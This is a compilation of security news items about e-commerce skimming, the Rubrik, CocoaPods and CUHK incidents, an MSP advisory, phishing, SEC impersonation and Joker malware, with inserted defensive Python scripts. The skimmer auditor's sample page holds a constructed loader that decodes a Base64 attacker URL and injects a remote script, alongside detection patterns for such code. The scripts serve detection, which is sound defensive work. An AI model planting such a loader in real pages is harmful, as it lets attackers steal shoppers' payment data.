
Security Alert as Malware Campaign Hits Widely Used E-commerce CMS



Security researchers have identified a malware campaign that poses a serious threat to thousands of online retailers by exploiting vulnerabilities in widely used content management systems. The campaign primarily targets stores built on open-source e-commerce frameworks such as Magento and WooCommerce: attackers inject malicious code into the platform to steal customer data, compromise checkout pages and gain administrative control over backend systems. 

The malware is part of a wider cybercriminal operation and silently harvests sensitive information such as payment details and login credentials without the shopper noticing. Several online storefronts have already suffered significant losses, and cybersecurity companies and digital commerce platforms have issued urgent advisories. 

The attackers have spread the malware at scale by abusing outdated plugins, unpatched CMS instances and misconfigured servers. E-commerce remains a lucrative target for financially motivated threat actors, and this incident underlines why merchants need to patch regularly, monitor for abnormal activity and follow security best practices. 

With consumer trust and financial transactions at risk, the campaign calls for immediate defensive action. The sections below explain how the attacks work, which platforms are affected and which mitigations prevent a recurrence. 

E-commerce platforms have become prime targets in the cybercrime landscape, with recent studies indicating that 32.4% of successful cyberattacks are directed at online retailers and transaction-based companies. The e-commerce ecosystem faces a growing number of threats, and malicious actors keep developing more sophisticated ways of exploiting its vulnerabilities. 

Store administrators, internal employees and unsuspecting customers are all exposed. Cybercriminals deploy a range of attack vectors, including phishing, credit card fraud, fake checkout pages, malicious bots and distributed denial-of-service (DDoS) attacks, to disrupt operations, steal sensitive information and erode customer trust. 

Businesses that fail to secure their systems suffer not only immediate financial losses but also long-term reputational damage and legal consequences. With incidents more prevalent and severe than ever, proactive and robust security measures are essential. 

Comprehensive malware removal and prevention services, such as those offered by Astra Security, help businesses detect, neutralise and recover from breaches of this kind. One of the most common ways attackers infiltrate e-commerce websites is by exploiting vulnerabilities in the platform itself, its infrastructure or insecure third-party integrations. 

Many breaches can be traced to an unfortunate combination of inadequate configuration management, outdated software and weak security controls at external vendors. High-profile platforms such as Magento are popular with online retailers and, for the same reason, with cybercriminals, particularly where security patches are delayed or misapplied. 

In the past few years cybercriminals have increasingly exploited known vulnerabilities (CVEs) in e-commerce platforms, with Adobe Commerce and Magento Open Source drawing a disproportionate share of attacks. CVE-2024-20720, a critical OS command injection flaw disclosed in early 2024, carries a CVSS score of 9.1. 

The vulnerability let attackers execute system commands remotely without any user interaction. Cybercriminal groups such as the notorious Magecart operators exploited it to implant persistent backdoors and exfiltrate sensitive customer information. 

Then there was the CosmicSting campaign, which exploited CVE-2024-34102, an XML external entity (XXE) flaw in Adobe Commerce and Magento, chained with CVE-2024-2961, a glibc iconv bug, to achieve remote code execution; it was reported to have affected more than 75% of Adobe Commerce and Magento installations worldwide. The XXE let attackers read critical configuration files, including the store's encryption key, forge privileged API tokens, inject malicious scripts into CMS blocks, escalate privileges and retain long-term control. 

CosmicSting's reach and sophistication show why e-commerce platforms must manage vulnerabilities proactively and monitor threats in real time. More recently, a disturbing new wave of Magecart-style attacks has been targeting e-commerce websites built on the OpenCart content management system (CMS).

The stealth of this latest incident has drawn particular attention from cybersecurity experts. The attackers injected malicious JavaScript directly into landing pages, disguised as the tags of legitimate third-party marketing and analytics providers such as Google Tag Manager and Meta Pixel. 

Embedding malicious code inside commonly used tracking snippets dramatically reduces the chance that traditional security tools detect it early. Analysts at c/side, a cybersecurity company specialising in client-side threat monitoring, said the script used in this attack was crafted to mimic the behaviour of a typical tag but showed suspicious patterns on closer examination. 

A particularly deceptive aspect of the campaign is its use of Base64 encoding to obfuscate the payload URLs, which point to suspicious domains such as tagscart[.]shop (serving /cdn/analytics.min.js). The encoding hides the script's true destination from simple inspection and lets it blend into legitimate traffic. 

Once decoded, the script creates new HTML script elements and inserts them ahead of the page's existing scripts, silently launching secondary payloads in the background. The final stage is heavily obfuscated JavaScript intended to frustrate reverse engineering and slip past basic security filters. 

It relies on hexadecimal-encoded strings, array manipulation and dynamic execution via eval(). Against client-side attacks of this sophistication, real-time script monitoring and validation are essential to protect e-commerce infrastructure. 
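The indicators described above (a Base64-hidden payload URL, a loader that creates and inserts new script elements, and a final stage mixing hex-encoded strings with eval()) can be checked for directly in a page's script tags. The following is an added example written for this post, not code from the c/side report or from OpenCart; the allowlist of tag hosts and the sample checkout page are constructed for the example, and only the payload URL comes from the write-up.

```python
"""Audit the <script> tags on a storefront page for client-side skimmer
indicators: payload URLs hidden in Base64, loaders that inject new script
elements, and hex-obfuscated eval() stages. Added example; the allowlist
and the sample page below are constructed, not taken from any real shop."""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this (hypothetical) shop legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "connect.facebook.net"}

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
HEX_RUN_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")
EVAL_RE = re.compile(r"\beval\s*\(")
LOADER_RE = re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)")


class _ScriptCollector(HTMLParser):
    """Split a page into external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def hidden_urls(script_text):
    """Return URLs that only appear after Base64-decoding blobs in the script."""
    urls = []
    for blob in B64_RE.findall(script_text):
        blob = blob.rstrip("=")
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            text = decoded.decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://", "//")):
            urls.append(text)
    return urls


def audit_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (indicator, detail) findings for a page's scripts."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname  # None for same-origin relative paths
        if host and host not in allowed_hosts:
            findings.append(("unknown-script-host", host))
    for body in collector.inline:
        for url in hidden_urls(body):
            host = urlparse(url).hostname
            if host not in allowed_hosts:
                findings.append(("base64-hidden-url", host))
        if LOADER_RE.search(body):
            findings.append(("dynamic-script-loader", None))
        if EVAL_RE.search(body) and HEX_RUN_RE.search(body):
            findings.append(("hex-obfuscated-eval", None))
    return findings


def csp_script_src(allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Build a Content-Security-Policy script-src directive from the same
    allowlist, so a loader pulling from an unlisted host is blocked and reported."""
    hosts = " ".join(f"https://{h}" for h in sorted(allowed_hosts))
    return f"script-src 'self' {hosts}; report-uri /csp-report"


# Constructed sample page: a genuine-looking GTM include, a fake "tag" that
# decodes a hidden URL and inserts a new script ahead of the others, and an
# obfuscated final stage. The payload URL is the one named in the write-up.
_PAYLOAD_B64 = base64.b64encode(b"https://tagscart.shop/cdn/analytics.min.js").decode()
SAMPLE_HTML = f"""
<html><head>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<script>
(function(){{var u=atob("{_PAYLOAD_B64}");var s=document.createElement('script');
s.src=u;document.head.insertBefore(s,document.head.firstChild);}})();
</script>
<script>var _0x1=["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"];eval(_0x1[0]);</script>
</head><body>checkout</body></html>
"""

if __name__ == "__main__":
    for indicator, detail in audit_page(SAMPLE_HTML):
        print(indicator, detail or "")
    print(csp_script_src())
```

Run against a fetched checkout page, the audit flags the hidden tagscart.shop URL, the dynamic loader and the hex-and-eval stage while leaving the allowlisted Google Tag Manager include alone. The same allowlist drives the CSP directive, so a script that is not on it fails to load and generates a report instead of running.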

Securing an e-commerce website is now a fundamental requirement for anyone who trades online, whether through a personal site or a full-scale business. 

Malware campaigns targeting Magento, WooCommerce, OpenCart and other platforms are growing more complex, and the cost of inaction can be devastating. A single unchecked vulnerability or outdated plugin can lead to credit card theft, customer data breaches, ransomware or complete loss of control of the site. For businesses that means financial losses, reputational damage, legal liability and lost customer trust; for an individual entrepreneur it can mean the end of a growing business. 

These threats can be mitigated with practical, proactive measures: regular updates and patching, strong access controls, careful vetting of third-party integrations, a web application firewall (WAF), continuous malware scanning and real-time monitoring. Because the threat landscape changes every year, security is a continuous process rather than a one-time task. 

As e-commerce keeps growing worldwide, the question is no longer whether your site, or a competitor's, will be targeted, but when. Investing in robust security today is about more than protecting the business; it is about surviving. Stay informed, stay current, and stay safe.

Security Update from Rubrik as Authentication Keys Are Reissued

 


Rubrik has disclosed that a security incident last month compromised one of its log file servers. In response, the company has begun rotating all authentication keys that may have been exposed so that the credentials cannot be used by malicious actors. 

The rotation is a precaution to ensure that unauthorised parties cannot use the compromised credentials to reach Rubrik's systems. The company is also reassessing its security posture to strengthen its resilience against future threats. 

Acting quickly on these corrective steps reinforces Rubrik's commitment to protecting its infrastructure and the integrity of its data security framework. 

Rubrik’s Growth, Financial Success, and Security Measures 


Founded in 2014 as a backup and recovery provider, Rubrik has grown into a leading data security and protection company. It went public in April 2024, raising roughly $750 million in its initial public offering, and for the fiscal quarter ending October 31, 2024, it reported revenue of $236.2 million, a strong indicator of its market growth. 

Rubrik was also affected in 2023, when a zero-day vulnerability (CVE-2023-0669) in Fortra's GoAnywhere MFT software gave threat actors access to its non-production IT testing environment. The Cl0p ransomware group claimed responsibility. Since then Rubrik has continued to strengthen its cybersecurity framework to protect customer data and catch threats early. 

Continuing that effort, Rubrik (NYSE: RBRK) has unveiled a series of innovations designed to enhance data security across cloud, software-as-a-service (SaaS) and on-premises infrastructures. 

These enhancements are designed to help organisations anticipate security breaches, identify emerging threats and recover rapidly and efficiently, regardless of where the data is located. 

Rubrik is set to present the new data protection solutions at its annual Cyber Resilience Summit on March 5, giving industry leaders and cybersecurity professionals their first look at the company's latest advances. 

Rubrik’s Global Presence and Industry Impact 


Rubrik offers backup, recovery and data protection services and has become a trusted partner for businesses worldwide, with a team of more than 3,000 people and more than 22 global offices. 

Its more than 6,000 customers include leading global organisations such as AMD, Adobe, PepsiCo, Home Depot, Allstate, Sephora, GSK, Honda, Harvard University and Trellix. In an increasingly digital landscape, Rubrik keeps expanding its security capabilities in pursuit of its mission of robust, scalable and intelligent cybersecurity solutions. 

Rubrik Investigates Security Incident Involving Log Server Compromise 


Earlier this week Rubrik published a security alert describing unusual activity on a server that stored log files. According to Rubrik's Information Security Team, the activity was first flagged by security researcher Kevin Beaumont, who reported his findings to the company. Once abnormal behaviour was confirmed on the affected server, Rubrik took it offline to contain any further risk. 

An independent forensic cybersecurity firm working with Rubrik found that the event was limited to this single server. A company spokesperson confirmed that no evidence of unauthorised access to customer data or internal code had been found.

Precautionary Measures and Security Enhancements 


Although Rubrik says the breach was confined to the log server, some of the log files contained access information, which is why the company is rotating authentication keys as a precaution. It remains unclear how the server was compromised and exactly what access information was exposed. 

Asked by Cybersecurity Dive for more detail, Rubrik said there is currently no indication that the exposed information has been misused, and that the ongoing investigation has found no sign of threat actors reaching its internal development environment or customer data.

Past Security Incidents


This is not the first security event to hit Rubrik. In 2023 it was among the organisations affected by the Clop ransomware group's large-scale exploitation of a zero-day vulnerability in Fortra's GoAnywhere managed file transfer software, which resulted in data theft from multiple enterprises, Rubrik included. 

Despite these incidents, the company continues to implement security measures aimed at cyber resilience and at protecting its infrastructure against evolving threats. 

Rubrik Unveils Advanced Data Protection and Security Enhancements 


Rubrik has announced a range of innovations intended to strengthen security, resilience and cyber threat mitigation for critical data: 

• Cloud Posture Risk Management (CPR): automated discovery, inventory and protection of cloud data assets measured against the organisation's cloud standards. 
• Cloud Protection for Oracle: extends Rubrik Security Cloud (RSC) to safeguard Oracle Cloud Infrastructure (OCI) databases and Oracle Cloud VMware Solution (OCVS) databases. 
• PostgreSQL Data Protection: secure backups for one of the most widely used open-source databases. 
• Red Hat OpenShift Backup: immutable, automated backups for applications running on OpenShift's Kubernetes platform. 
• Azure DevOps and GitHub Backup: resilient backups for CI/CD environments and source repositories. 
• Rubrik Cloud Vault (RCV) for Amazon Web Services: air-gapped, encrypted, policy-driven data preservation. 
• Microsoft Dynamics 365 protection: safeguards both internal and customer data held in Dynamics 365. 
• Salesforce Sandbox Seeding: efficient, error-free copying of data from live application environments to sandboxes. 
• Active Directory (AD) and Entra ID Recovery: fast, malware-free recovery of identity infrastructure. 
• Advanced security for Azure and AWS: combines anomaly detection, data classification and threat monitoring. 
• Turbo Threat Hunting: rapid, malware-free recovery, scanning 75,000 backup files in 60 seconds. 
• Microsoft 365 Enterprise Edition: adds Sensitive Data Discovery, Prioritized Recovery and Threat Intelligence tools. 

These enhancements further reinforce Rubrik's commitment to supporting proactive cyber resilience by providing secure data protection. Rubrik's proactive responses to security incidents and ongoing research in data protection also reinforce this commitment. 

Rubrik's ability to address vulnerabilities quickly and introduce advanced security solutions sets new standards for threat detection, rapid recovery and intelligent data protection. As cyber threats continue to evolve, organisations must prioritise strong security strategies, using capabilities such as Turbo Threat Hunting and Identity Recovery to keep their customers protected. 

It is Rubrik's steadfast commitment to safeguarding enterprise data that enables businesses to navigate digital challenges with a degree of confidence, agility, and resilience that sets it apart.

CocoaPods Security Alert: Critical Bugs Expose Millions of Apps


A recent security analysis discovered critical vulnerabilities in CocoaPods, the widely used dependency management platform for Apple developers. These vulnerabilities pose significant risks to iOS and macOS apps, potentially allowing attackers to compromise user data and system integrity.

Apple CocoaPods Bugs Expose Millions of Apps to Code Injection

CocoaPods is a platform allowing Apple developers to add and manage other libraries (called "pods"). It has 100,000+ libraries that are utilized by over three million apps, including the most popular worldwide. 

A brief scan of its website finds pods used by Instagram, X, Slack, Airbnb, Tinder and Uber, to name a few. That makes individual pods attractive targets, and a platform-wide vulnerability in CocoaPods itself a far richer one.

According to research published recently by E.V.A Information Security, CocoaPods had a trio of significant vulnerabilities. The most serious, CVE-2024-38366, a remote code execution (RCE) flaw, received a critical CVSS rating of 10 out of 10. CVE-2024-38368, which concerned pods without owners, scored a critical 9.3, and CVE-2024-38367, a session verification hijacking vulnerability, scored 8.2.

1. Remote Code Execution (CVE-2024-38366)

A flaw in the Trunk server's email verification workflow allowed attackers to execute arbitrary code on the server that publishes pods. The impact: anyone controlling that server could tamper with pods, and apps relying on the compromised dependencies could be made to execute arbitrary code.

2. Unowned Pods (CVE-2024-38368)

A 2014 migration left thousands of pods without a claimed owner, and the public claims process let anyone take ownership of them. The risk: attackers could claim an orphaned pod and publish malicious versions of it, compromising every app that pulled it in.

3. Session Verification Hijacking (CVE-2024-38367)

The Trunk server built the link in its session-validation email from the X-Forwarded-Host header, so an attacker could have that link delivered to a server they controlled and hijack the pod owner's session. The consequence: the attacker could modify the owner's pods, and apps using them would unknowingly pull compromised libraries.

How to Stay Safe?

Regular Dependency Updates

  • Developers must consistently update their CocoaPods dependencies to receive security patches promptly.
  • Tools like pod outdated help identify outdated libraries.

Ownership Verification

  • Before integrating third-party pods, verify their ownership and integrity.
  • Pin exact versions and commit your Podfile.lock, whose SPEC CHECKSUMS section records a checksum of each resolved podspec, so an unexpected change stands out in review.

Code Signing and Notarization

  • Code signing ensures that only trusted code runs on users’ devices.
  • Apple’s notarization process adds an extra layer of security by verifying app binaries.
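One practical form of the ownership and integrity check above is to compare the Podfile.lock a build resolved against the one committed to the repository and flag anything that moved without a version bump. This is an added example written for this post, not part of CocoaPods or the E.V.A research; it parses the real Podfile.lock layout, but both lock files below (and their checksums) are constructed for the example.

```python
"""Diff a Podfile.lock against a committed baseline of podspec checksums.
CocoaPods writes a SHA-1 of every resolved podspec under SPEC CHECKSUMS, so a
checksum that changes while the version stays the same, or a pod with no
checksum at all, deserves a look before the build is trusted. Added example;
the two lock files are constructed."""
import re

_POD_LINE = re.compile(r"^  - ([\w./+-]+) \(([^)]+)\)")          # top-level PODS entries only
_CHECKSUM_LINE = re.compile(r"^  ([\w./+-]+): ([0-9a-f]{40})$")  # name: sha1


def parse_podfile_lock(text):
    """Return {pod: (version, checksum_or_None)}; subspecs fold into their parent pod."""
    versions, checksums, section = {}, {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):          # an unindented line starts a new section
            section = line.split(":")[0]
            continue
        if section == "PODS":
            m = _POD_LINE.match(line)
            if m:
                versions.setdefault(m.group(1).split("/")[0], m.group(2))
        elif section == "SPEC CHECKSUMS":
            m = _CHECKSUM_LINE.match(line)
            if m:
                checksums[m.group(1)] = m.group(2)
    return {name: (ver, checksums.get(name)) for name, ver in versions.items()}


def audit_lockfile(current_text, baseline_text):
    """Flag checksum changes without a version bump, missing checksums and new pods."""
    current, baseline = parse_podfile_lock(current_text), parse_podfile_lock(baseline_text)
    findings = []
    for name, (version, checksum) in sorted(current.items()):
        if checksum is None:
            findings.append(("missing-checksum", name, version))
        if name not in baseline:
            findings.append(("new-pod", name, version))
            continue
        base_version, base_checksum = baseline[name]
        if version == base_version and checksum != base_checksum:
            findings.append(("checksum-changed-same-version", name, version))
    return findings


# Constructed baseline: the Podfile.lock committed with the last reviewed build.
BASELINE_LOCK = """PODS:
  - Alamofire (5.9.1)
  - Firebase/Core (10.0.0):
    - FirebaseCore (= 10.0.0)
  - FirebaseCore (10.0.0)
  - SwiftyJSON (5.0.1)

DEPENDENCIES:
  - Alamofire (~> 5.9)
  - Firebase/Core
  - SwiftyJSON

SPEC CHECKSUMS:
  Alamofire: 0123456789abcdef0123456789abcdef01234567
  Firebase: 89abcdef0123456789abcdef0123456789abcdef
  FirebaseCore: fedcba9876543210fedcba9876543210fedcba98
  SwiftyJSON: 1111111111111111111111111111111111111111

COCOAPODS: 1.15.2
"""

# Constructed current lock: same versions, but Alamofire's podspec checksum
# differs and a newly added pod carries no checksum at all.
CURRENT_LOCK = BASELINE_LOCK.replace(
    "Alamofire: 0123456789abcdef0123456789abcdef01234567",
    "Alamofire: 2222222222222222222222222222222222222222",
).replace("  - SwiftyJSON (5.0.1)\n", "  - SwiftyJSON (5.0.1)\n  - NewPod (1.0.0)\n")

if __name__ == "__main__":
    for finding in audit_lockfile(CURRENT_LOCK, BASELINE_LOCK):
        print(*finding)
```

A changed checksum for an unchanged version means the podspec that resolved is not the one reviewed last time, which is exactly what a hijacked or re-claimed pod would look like; run the check in CI before `pod install` output is trusted and treat a non-empty result as a build failure until someone has looked.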

Finding Exploit A Long Shot

There is no convincing evidence that attackers exploited any of the vulnerabilities, which the researchers reported and CocoaPods patched in October 2023.

It's worth noting, however, that software supply chain flaws are easily concealed, and the enormous number of pods exposed for so long would have given anyone who did exploit them ample cover.

A decade-long exposure window might be expected to have produced evidence of exploitation, but none has surfaced. Instead, E.V.A suggests that developers of apps that relied on pods before last October (i.e., almost all Apple apps) take six remedial steps, including checking for orphaned pods and thoroughly reviewing all third-party code dependencies.

Major Data Breach at CUHK Affects Over 20,000 Students and Staff

 


More than 20,000 people connected to the Chinese University of Hong Kong (CUHK) have had personal information stolen in a data breach at one of the university's schools, the latest in a string of breaches in the city. In a statement on Thursday, the School of Continuing and Professional Studies (CUSCS) said the server of an online learning system it uses was hacked on June 3. 

Some 20,870 Moodle accounts were involved, belonging to employees, part-time tutors, students, graduates and some visitors, and holding names, email addresses and student numbers. The college said that after detecting three unsuccessful login attempts it deactivated the account concerned, reset its password, moved the learning platform off the affected server and strengthened security to block further access. 

The stolen data consisted of names and email addresses, and an investigation by cybersecurity professionals found no sign that it had been published on public websites or the dark web. The incident was reported to the police and to the Office of the Privacy Commissioner for Personal Data (PCPD), the city's privacy watchdog, which said it received a report from CUHK on Wednesday and a complaint about the breach on Thursday. 

Moodle is an open-source learning management system that lets teachers, administrators and students build individualised online learning environments in schools, colleges and workplaces. A custom site can be built around an online course and extended with community-sourced plugins. 

The college has set up a crisis management team, comprising the dean, deputy dean, director of information technology services, director of administration and director of communications and public relations, to assess the risks arising from the incident, and has reported the incident to CUHK. A security consultant hired by the college carried out an immediate investigation and found that no large volume of data had been exposed and that the information was not on the dark web. 

The university followed its established procedures in notifying the police and the PCPD, which confirmed receiving a complaint on Thursday. In its statement CUSCS put the number of compromised Moodle accounts, covering tutors, students, graduates and visitors, at 22,873, with names, emails and student numbers exposed. 

Despite the university's statement that it was unaware of any leaks on public platforms, the breached data was subsequently found on offer on the dark web forum BreachForums. A threat actor (TA) using the alias "Valerie" posted that they were willing to sell the data. "Approximately 75 per cent of the stolen information was sold to a private party, and the breach was financed in this way by the private party," the TA stated, adding that the rest of the data had not been shared. "Following multiple offers, it was decided to take the initiative and make a public sale." 

This is the third educational institution in Hong Kong to be struck by a cyber attack this year. In May, the Hong Kong Institute of Contemporary Culture Lee Shau Kee School of Creativity was hit by a ransomware attack that compromised data belonging to more than 600 students and faculty members. 

In April, Union Hospital, a private medical facility, experienced a ransomware attack that compromised its servers and reportedly resulted in operational paralysis. Similarly, in February, the Hong Kong College of Technology faced a ransomware attack, leading to a data breach affecting approximately 8,100 students.

Five Eyes Agencies Warn Managed Service Providers of Cyber Attacks

 

The Five Eyes alliance of cybersecurity authorities from the United States, the United Kingdom, Australia, New Zealand, and Canada last week published a joint advisory warning of threats targeting managed service providers (MSPs) and their customers. 

The advisory tells MSP customers in the member nations how to protect sensitive information and urges them to reassess their security posture and their contractual agreements with service providers according to their own risk tolerance. MSPs are a prime target for cybercriminals and nation-state actors because compromising one MSP can yield many downstream victims, as the Kaseya and SolarWinds attacks showed.

"As this advisory makes clear, malicious cyber actors continue to target managed service providers, which is why it's critical that MSPs and their customers take recommended actions to protect their networks," Jen Easterly, director of US's Cybersecurity and Infrastructure Security Agency (CISA) stated. 

"We know that MSPs that are vulnerable to exploitation significantly increase downstream risks to the businesses and organizations they support. Securing MSPs are critical to our collective cyber defense, and CISA and our interagency and international partners are committed to hardening their security and improving the resilience of our global supply chain," she added. 

The alert is the result of a collaborative effort among the Cybersecurity and Infrastructure Security Agency, the National Security Agency, and the Federal Bureau of Investigation in the U.S.; the National Cyber Security Centers in the United Kingdom and New Zealand; the Australian Cyber Security Center; and the Canadian Center for Cyber Security. 

Mitigation tips 

The advisory, issued on the second day of the NCSC's CyberUK conference, where senior figures from the agencies met to discuss global cyber threats, recommends that MSP customers ensure their providers implement the following measures and controls: 

• Prevent initial compromise by hardening vulnerable devices, protecting internet-facing services and defending against brute-force and phishing attacks. 
• Improve monitoring and logging of the delivery infrastructure used to provide services to customers. 
• Enable multifactor authentication across all customer services and products. 
• Periodically remove obsolete accounts and infrastructure and apply updates whenever they are available and necessary. 
• Develop incident response and recovery plans. 
• Understand and proactively manage supply chain risk. 
• Adopt transparent processes and manage account authentication and authorisation.

Ukrainian CERT Alerts Citizens of Phishing Attacks Using Hacked Accounts

 

The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of new phishing attacks directed at Ukrainian citizens, which use hijacked email accounts belonging to three separate Indian businesses to infiltrate their inboxes and steal sensitive data. 

The emails carry a subject line meaning "Attention" and pretend to come from the domestic email service Ukr.net, but the sender address is "muthuprakash.b@tvsrubber[.]com," according to the agency. The messages claim that an unauthorised attempt was made to log in to the recipient's account from an IP address in Donetsk, Ukraine, and urge them to change their password immediately by clicking a link. 

CERT-UA noted in a Facebook post over the weekend, "After following the link and entering the password, it gets to the attackers. In this way, they gain access to the email inboxes of Ukrainian citizens." 

TVS Rubber is an automotive company in the Indian city of Madurai, which suggests the phishing emails were sent from an already compromised account. In a further update, CERT-UA said it had found another 20 email addresses used in the attacks, some belonging to sysadmins and faculty members at Ramaiah University of Applied Sciences, an academic institution in Bengaluru, India. 

An email address from Hodek Vibration Technologies Pvt. Ltd., an India-based automotive company that designs and manufactures dampers for cars, light and heavy commercial vehicles, and other industrial equipment, is also featured in the list. 
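The giveaway in this campaign is structural rather than technical: a message that presents itself as a Ukr.net security notice but is sent from an unrelated company's mailbox, with a "change your password" link that leads somewhere other than the brand's own domain. The check below is an added example written for this post, not CERT-UA's tooling; the two messages are constructed, the sender address is the one CERT-UA published (shown defanged in the text above), the reset link uses an example.net placeholder, and the brand-to-domain mapping is an assumption a mail filter would maintain itself.

```python
"""Flag lure emails whose claimed brand does not match the sending domain or
the domains their links point to. Added example; messages are constructed."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Brand string a recipient would recognise -> domains allowed to send as that brand (assumption).
BRAND_DOMAINS = {"ukr.net": {"ukr.net"}}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def registered_domain(host):
    """Naive last-two-labels domain; production code would use the public suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def domain_of(address):
    """Registered domain of an RFC 5322 address, or '' if there is none."""
    _, addr = parseaddr(address or "")
    return registered_domain(addr.rsplit("@", 1)[1]) if "@" in addr else ""


def analyse_message(raw):
    """Return (indicator, brand, offending_domain) findings for one message."""
    msg = message_from_string(raw)
    display_name = parseaddr(msg.get("From", ""))[0]
    sender_domain = domain_of(msg.get("From", ""))
    claimed = f"{display_name} {msg.get('Subject', '')}".lower()
    body = msg.get_payload(decode=True) or b""
    body = body.decode(msg.get_content_charset() or "utf-8", "replace")
    findings = []
    for brand, legit in BRAND_DOMAINS.items():
        if brand not in claimed:
            continue  # the message does not present itself as this brand
        if sender_domain not in legit:
            findings.append(("brand-sender-mismatch", brand, sender_domain))
        for url in URL_RE.findall(body):
            link_domain = registered_domain(urlparse(url).hostname or "")
            if link_domain not in legit:
                findings.append(("off-brand-link", brand, link_domain))
    return findings


# Constructed lure modelled on the advisory: Ukr.net branding, a compromised
# third-party sender, urgency, and a reset link whose path mentions the brand
# but whose host (an example.net placeholder) does not.
LURE = """From: "Ukr.net Security" <muthuprakash.b@tvsrubber.com>
To: user@ukr.net
Subject: Attention
Content-Type: text/plain; charset=utf-8

An unauthorised login to your account was attempted from an IP address in Donetsk.
Change your password immediately: https://account-reset.example.net/ukr.net/login
"""

# Constructed benign notice for comparison: brand, sender and link domains agree.
GENUINE = """From: "Ukr.net Security" <noreply@ukr.net>
To: user@ukr.net
Subject: Attention
Content-Type: text/plain; charset=utf-8

Review recent sign-ins at https://accounts.ukr.net/security
"""

if __name__ == "__main__":
    print(analyse_message(LURE))     # mismatched sender and off-brand link
    print(analyse_message(GENUINE))  # []
```

The check deliberately keys on what the recipient sees (display name and subject) rather than on the envelope, because that is what the lure is designed to exploit; a compromised mailbox passes SPF and DKIM for its own domain, so only the brand-versus-domain disagreement gives it away.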

"All these mailboxes have been compromised and are being used by the Russian Federation's special services to carry out cyberattacks on Ukrainian citizens," the agency said. 

The news comes as NATO member states unanimously agreed to admit Ukraine as a "Contributing Participant" in the Cooperative Cyber Defence Centre of Excellence (CCDCOE), as Russia's military invasion of the country entered its second week and cyber attacks rained down on government and commercial targets. 

"Ukraine's presence in the Centre will enhance the exchange of cyber expertise between Ukraine and CCDCOE member nations. Ukraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises and training," Col Jaak Tarien, director of CCDCOE, said in a statement.

US SEC Alerts Investors of Ongoing Fraud

The Securities and Exchange Commission (SEC) is alerting investors about scammers posing as SEC officials and attempting to mislead them. 

Fraudsters are contacting investors via phone calls, voicemails, emails, and letters, according to the SEC's Office of Investor Education and Advocacy (OIEA). 

The alert stated, "We are aware that several individuals recently received phone calls or voicemail messages that appeared to be from an SEC phone number. The calls and messages raised purported concerns about unauthorized transactions or other suspicious activity in the recipients' checking or cryptocurrency accounts. These phone calls and voicemail messages are in no way connected to the Securities and Exchange Commission." 

The SEC warned that it never asks for payments linked to enforcement activities, offers to confirm trades, or seeks sensitive personal and financial information in unsolicited communications, including emails and letters. It further stated that SEC officials will not ask about shareholdings, account numbers, PINs, passwords, or other personal information. 

Scammers appear to be employing a growing number of strategies to boost their chances of success. According to the notice, investors should not disclose any personal information if they receive a communication that appears to come from the Securities and Exchange Commission; they are encouraged to contact the commission directly to verify it.

Investors can use the SEC's personnel locator at (202) 551-6000, call (800) SEC-0330, or email help@SEC.gov to confirm the identity of people behind calls or messages. Investors can also file a complaint with the Securities and Exchange Commission's Office of Inspector General by visiting www.sec.gov/oig or calling (833) SEC-OIG1 (732-6441). 

Further, the alert stated, "Beware of government impersonator schemes. Con artists have used the names of real SEC employees and email messages that falsely appear to be from the Securities and Exchange Commission to trick victims into sending the fraudster money. Impersonation of US Government agencies and employees (as well as of legitimate financial services entities) is one common feature of advance fee solicitations and other fraudulent schemes. Even where the fraudsters do not request that funds be sent directly to them, they may use personal information they obtain to steal an individual's identity or misappropriate their financial assets."

Joker Malware Targeting Android Users Again

Joker malware has recently been found in several Google Play Store apps. The malware reaches a user's device through these applications, harvests data, and then signs the user up for premium subscription services without their knowledge or consent. 

The Joker Trojan has been turning up in Google Play Store apps for three years. In July 2020, Joker was found in over 40 Android apps on Google Play, forcing Google to remove the compromised apps from the store. The malware steals users' data, including SMS messages, contact lists, device information, OTPs, and other sensitive information.

Quick Heal Security Labs recently discovered eight apps carrying Joker malware on the Google Play Store. The apps were reported to Google, which has since removed them all from its store. 

The following eight apps were found to carry the Joker Trojan and should be removed from any Android device: 
-Auxiliary Message 
-Fast Magic SMS 
-Free CamScanner 
-Super Message 
-Element Scanner 
-Go Messages 
-Travel Wallpapers 
-Super SMS 

Through SMS messages, contact lists, and device information, the Joker Trojan collects information from the victim's device. The Trojan then interacts discreetly with advertising websites and, without the victim's knowledge, subscribes them to premium services. 

According to the Quick Heal report, these applications request notification access at launch and then use it to read notification content. The malware extracts SMS data from the notifications (which is how it reaches OTPs without holding SMS permissions directly) and then requests Contacts access. Once that is granted, the app is also able to make and manage phone calls. From then on it keeps running without giving the user any visible sign of malicious activity. 
